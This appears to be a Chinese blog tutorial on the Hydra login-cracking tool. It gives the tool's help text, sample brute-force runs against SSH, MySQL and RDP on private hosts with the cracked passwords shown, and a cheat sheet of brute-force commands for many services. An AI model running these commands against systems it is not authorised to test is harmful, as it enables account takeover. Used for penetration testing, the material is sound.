参数说明:

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-q do not print messages about connection errors
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)

Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh

常用实例:

SSH暴力破解
e2a5e@kali:~$ hydra -L /data/dic/user.dic -P /data/dic/password.dic -t 5 192.168.2.235 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-27 09:08:41
[DATA] max 5 tasks per 1 server, overall 5 tasks, 10 login tries (l:2/p:5), ~2 tries per task
[DATA] attacking ssh://192.168.2.235:22/
[22][ssh] host: 192.168.2.235 login: root password: HDXY123!@#
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-08-27 09:08:46

mysql暴力破解
e2a5e@kali:~$ hydra -L /data/dic/user.dic -P /data/dic/password.dic -t 5 192.168.2.235 mysql
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-27 09:07:25
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 8 login tries (l:2/p:4), ~2 tries per task
[DATA] attacking mysql://192.168.2.235:3306/
[3306][mysql] host: 192.168.2.235 login: root password: 123456
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-08-27 09:07:26

远程桌面暴力破解
e2a5e@kali:~$ hydra -L /data/dic/user.dic -P /data/dic/password.dic -t 1 192.168.2.57 rdp
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-08-27 09:12:10
[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.
[DATA] max 1 task per 1 server, overall 1 task, 15 login tries (l:3/p:5), ~15 tries per task
[DATA] attacking rdp://192.168.2.57:3389/
[3389][rdp] host: 192.168.2.57 login: administrator password: HDXY123!@#
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-08-27 09:12:11

其他常用破解命令

使用hydra破解ssh的密码
hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh

破解https:
hydra -m /index.php -l username -P pass.txt IP https

破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco:
hydra -P pass.txt IP cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解smb:
hydra -l administrator -P pass.txt IP smb

破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3

破解rdp:
hydra IP rdp -l administrator -P pass.txt -V

破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解telnet
hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

破解ftp:
hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV

get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.php

hydra 常用命令解析的更多相关文章

  1. angular-cli.json配置参数解析,常用命令解析

    1.angular-cli.json配置参数解析 { "project": { "name": "ng-admin", //项目名称 &qu ...

  2. npm常用命令解析

    npm是什么 NPM的全称是Node Package Manager,是随同NodeJS一起安装的包管理和分发工具,它很方便让JavaScript开发者下载.安装.上传以及管理已经安装的包. npm ...

  3. linux系统入门一些常用命令解析

    接触IT行业的时候,就使用了ubuntu系统做开发,那个时候是一头雾水,从习惯了window下的界面操作,到终端下的命令行操作,着实一开始让人很不习惯.但是没办法,那个时候公司每个人都用Ubuntu系 ...

  4. LDAP常用命令解析

    OpenLDAP常用命令讲解: ldapadd      -x   进行简单认证      -D   用来绑定服务器的DN      -h   目录服务的地址      -w   绑定DN的密码    ...

  5. Maven学习归纳(二)——几个常用命令解析

    Maven的常用命令 第一次执行命令的时候,因为需要下载执行命令的基础环境,所以会从远程仓库下载该环境到本地仓库中 运行mvn命令,必须在pom.xml文件所在的目录 一. JavaProject的p ...

  6. ffmpg常用命令解析

    1 相关学习官网地址 官网地址:https://www.ffmpeg.org 安装步骤:https://www.johnvansickle.com/ffmpeg/faq/ 2 涉及的常用命令 视频格式 ...

  7. iptables 常用命令解析

    查看当前iptables规则: iptables -n -L --line-numbers该命令会以列表的形式显示出当前使用的 iptables 规则,并不做解析,每一条规则前面的编号可以用来做为其它 ...

  8. linux常用命令解析

    linux下一些注意事项 1. linux下严格区分大小写 ls 简述:列出文件或目录列表. -> ls 默认列出当前目录下的所有文件. -> ls -l(long)以长格式查看文件. - ...

  9. SSH 常用命令解析

    SSH 是什么 SSH(全 称 Secure Shell)是一种加密的网络协议.使用该协议的数据将被加密,如果在传输中间数据泄漏,也可以确保没有人能读取出有用信息.要使用 SSH,目标机器应该安装 S ...

随机推荐

  1. 微信小程序开发练习

    微信小程序开发工具git管理 https://blog.csdn.net/qq_36672905/article/details/82887102 这个开发工具的界面和交互真的是熟悉又友好,吹爆他

  2. 【Resharper】C# “Simplify conditional ternary expression”

    #事故现场: 对某个对象做空值检测的时候,结合三元运算符给某变量赋值的时候,R#提示:"Simplify conditional ternary expression" : R#建 ...

  3. HTML5之图片转base64编码

    之前在群里看到很多小哥哥小姐姐讨论关于图片base64互转的方法,刚好我之前用到的一个方法给大家分享一下. <!Doctype html><html> <head> ...

  4. linux 主机通过虚拟机(win10)上网

    公司内网必须安装安全软件(exe)才可以上网,但是我的系统是deepin,用deepin-wine无法安软该exe,于是用vmware安装了win10虚拟机,通过虚拟机上网 先简单介绍下vmware以 ...

  5. springboot实践1

    环境安装 安装jdk 推荐安装jkd1.8+,我使用的是mac,假设已经安装好homebrew,则jdk的安装指令是: brew install java 在 ~/zshrc ,添加两行 export ...

  6. 图解隐马尔可夫模型(HMM)

    写在前面 最近在写论文过程中,研究了一些关于概率统计的算法,也从网上收集了不少资料,在此整理一下与各位朋友分享. 隐马尔可夫模型,简称HMM(Hidden Markov Model), 是一种基于概率 ...

  7. laravel中视图的基本使用(七)

    laravel中的视图默认保存在 resources\views 目录下.在控制器中,我们通常使用 view() 方法返回一个视图文件. <?php namespace App\Http\Con ...

  8. Spring Boot 中如何定制 Banner

    本人免费整理了Java高级资料,涵盖了Java.Redis.MongoDB.MySQL.Zookeeper.Spring Cloud.Dubbo高并发分布式等教程,一共30G,需要自己领取.传送门:h ...

  9. DevExpress的TreeList实现自定义右键菜单打开文件选择对话框

    场景 DevExpress的TreeList实现节点上添加自定义右键菜单并实现删除节点功能: https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/det ...

  10. 图片在DIV里边水平垂直居中

    图片在一个DIV中要垂直水平居中,首先定义一个DIV .wrap{ width: 600px; height: 400px; border: 1px #000 solid; } 插入图片 <di ...